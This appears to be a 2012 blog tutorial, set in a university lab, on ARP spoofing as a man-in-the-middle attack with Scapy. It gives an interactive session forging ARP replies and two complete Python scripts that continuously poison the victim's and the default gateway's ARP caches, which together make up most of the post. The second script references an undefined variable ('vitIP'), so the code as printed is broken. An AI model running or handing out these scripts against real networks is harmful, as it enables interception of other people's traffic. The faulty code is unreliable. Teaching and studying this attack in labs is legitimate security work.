MITM 4: ARP spoofing (exploit)

Posted on January 31, 2012

1


Now I described how ARP works, let’s exploit the weakness: deceiving the victim and the default gateway by pretending to be both of them.

There are many tools for the ARP spoofing such as Cain & Abel, Ettercap and DSniff (I will soon write a tutorial about Ettercap and Cain & Abel). In order to get a better understanding of the ARP spoofing, I will use Scapy.

Here is the configuration: I have two Ubuntu Natty. I really don’t like this version of Ubuntu, but I still prefer to use Linux than Windows for this tutorial and that’s what we have in the lab of my former University. Both computer are on the network 10.0.0.0/24. The attacker computer (i.e. the one that will perform the ARP spoof attack) has the IP address: 10.0.0.231 and the MAC address 00:14:38:00:00:01. The victim has the IP address 10.0.0.209 and the MAC address 00:14:38:00:00:02. The default gateway (GW) has the IP address 10.0.0.1 and the MAC address 00:19:56:00:00:01.

Let’s start by forging the ARP packet (on the attacker computer) to deceive the victim with Scapy:

 >>> arpFake = ARP()
 >>> arpFake.op=2
 >>> arpFake.psrc="10.0.0.1"
 >>> arpFake.pdst="10.0.0.209"
 >>> arpFake.hwdst="00:14:38:00:00:02"
 >>> arpFake.show()
 ###[ ARP ]###
   hwtype= 0x1
   ptype= 0x800
   hwlen= 6
   plen= 4
   op= is-at
   hwsrc= 00:14:38:00:00:01
   psrc= 10.0.0.1
   hwdst= 00:14:38:00:00:02
   pdst= 10.0.0.209

Here is the ARP table of the victim before sending the packet:

user@victim-PC:/# arp -a
? (10.0.0.1) at 00:19:56:00:00:01 [ether] on eth1
attacker-PC.local (10.0.0.231) at 00:14:38:00:00:01 [ether] eth1

You  might have an empty ARP table. In order to get the information about both MAC addresses, you can ping them, it will send ARP requests to fill the table.

Then once you send the packet with Scapy:

 >>> send(arpFake)

The ARP table of the victim looks like this:

user@victim-PC:/# arp -a
? (10.0.0.1) at 00:14:38:00:00:01 [ether] on eth1
attacker-PC.local (10.0.0.231) at 00:14:38:00:00:01 [ether] eth1

The problem is that after a while, the default gateway sends an ARP replies telling its correct MAC address.

This means the victim is not deceived anymore and the communication doesn’t pass by the attacker anymore. A solution to this is to sniff the communication and whenever the default gateway sends an ARP replies, the attacker spoof the victim. Here is the script:

#!/usr/bin/python

# Import scapy
from scapy.all import *

# Setting variables
attIP="10.0.0.231"
attMAC="00:14:38:00:00:01"
vicIP="10.0.0.209"
vicMAC="00:14:38:00:00:02"
dgwIP="10.0.0.1"
dgwMAC="00:19:56:00:00:01"

# Forge the ARP packet
arpFake = ARP()
arpFake.op=2
arpFake.psrc=dgwIP
arpFake.pdst=vicIP
arpFake.hwdst=vicMAC

# While loop to send ARP
# when the cache is not spoofed
while True:

 # Send the ARP replies
 send(arpFake)
 print "ARP sent"

 # Wait for a ARP replies from the default GW
 sniff(filter="arp and host 10.0.0.1", count=1)

Once again, to run this script, save it as a python file (for instance under the name arpspoof.py) and run it with administrator privileges (root): sudo python arpspoof.py

This is how to spoof the ARP table of the victim. Now the communication from the victim to network outside 10.0.0.0/24 (and therefore sent first to the default gateway) pass through the attacker. But the communication from the default gateway to the victim goes directly to the victim because the default gateway ARP table has not been spoofed. Here is the script to spoof both the victim and the default GW:

#!/usr/bin/python

# Import scapy
from scapy.all import *

# Setting variables
attIP="10.0.0.231"
attMAC="00:14:38:00:00:01"
vicIP="10.0.0.209"
vicMAC="00:14:38:00:00:02"
dgwIP="10.0.0.1"
dgwMAC="00:19:56:00:00:01"

# Forge the ARP packet for the victim
arpFakeVic = ARP()
arpFakeVic.op=2
arpFakeVic.psrc=dgwIP
arpFakeVic.pdst=vicIP
arpFakeVic.hwdst=vicMAC

# Forge the ARP packet for the default GW
arpFakeDGW = ARP()
arpFakeDGW.op=2
arpFakeDGW.psrc=vitIP
arpFakeDGW.pdst=dgwIP
arpFakeDGW.hwdst=dgwMAC

# While loop to send ARP
# when the cache is not spoofed
while True:

 # Send the ARP replies
 send(arpFakeVic)
 send(arpFakeDGW)
 print "ARP sent"

 # Wait for a ARP replies from the default GW
 sniff(filter="arp and host 10.0.0.1 or host 10.0.0.209", count=1)

Now the ARP spoof is done, if you browse a website with the victim’s computer, you may have your connection blocked. The reason is that most of computer doesn’t forward the packet if its IP address doesn’t match the destination IP address of the packet. The next post will describe how to forward IP packet on Linux and OS X using sysctl.

Advertisements
Posted in: Tutorials